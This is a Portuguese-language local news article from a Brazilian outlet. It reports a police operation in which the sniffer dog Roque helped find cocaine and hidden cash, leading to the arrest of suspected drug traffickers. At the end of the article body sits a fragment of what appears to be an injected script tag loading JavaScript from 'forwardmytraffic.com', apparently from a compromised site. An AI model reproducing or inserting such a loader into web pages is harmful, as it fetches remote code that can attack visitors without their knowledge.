InícioDestaquePM Prende Traficantes com Ajuda de "Roque" Cão policial

PM Prende Traficantes com Ajuda de “Roque” Cão policial

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio estimado em R$ 3,5 milhões

As seis dezenas do concurso 2.716 da Mega-Sena serão...

Pedidos de isenção da taxa do Enem podem ser feitos até sexta-feira

Termina na próxima sexta-feira (26) o prazo para pedir...

Entenda o Programa Acredita, que pretende ampliar acesso ao crédito

Com o potencial de destravar até R$ 30 bilhões...

Onde a Gu Pm ROCAM em rondas se deparou com veículo GM Celta em atitude suspeita na Av. Dos Expedicionários no bairro Campo da água verde.

 

 

Foi efetuado ordem de parada, momento que foi arremessado pela janela alguns objetos brancos. O policial parou e apanhou os objetos, enquanto as demais motocicletas seguiram em acompanhamento.

 

 

Os objetos arremessados foram identificados como semelhantes a Cocaína – 7.2 Grama(s), foi realizado abordagem e identificado os masculinos, nada havendo contra, foi realizado averiguação nos celulares dos ocupantes dos veículos, onde foi verificado que negociavam drogas com um masculino que mora no campo da água verde. O condutor do veículo também sabia do tráfico, porém fez parte da organização criminosa como o transportador, recebendo por isso parcela de cocaína.

 

 

Com a situação citada, a Gu Pm ROCAM solicitou apoio de viaturas da rádio patrulha, seção de investigação e CANIL que juntos deslocaram até a casa do condutor que foi verificado ser o cabeça da organização, aquele que recebia e fracionava a droga para repassar os revendedores.

 

 

No local da residência a Gu se deparou com uma feminina que resistiu e desacatou um policial nao permitindo entrar.

 

 

A guarnição do CANIL do 3BPM passou o cão ROQUE na residência sendo que este indicou um local e assim localizado debaixo do sofá Cocaína – 4 Grama(s).

 

 

Posteriormente os policiais adentraram e localizaram na residência Dinheiro – 1954 Real(is) e cédulas de 100, 50, 20 , 10 e 5 reais no interior de um vídeo game.

 

 

Contudo, devido às conversas localizadas no celular por meio do aplicativo Whatsapp foi verificado que todos os masculinos compõe uma organização criminosa e que realizam juntos tráfico de Tráfico de drogas.

 

 

Foi dado voz de prisão aos envolvidos e conduzidos à delegacia de Polícia Civil, a feminina foi conduzida e na delegacia ouvida, compromissada e liberada…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.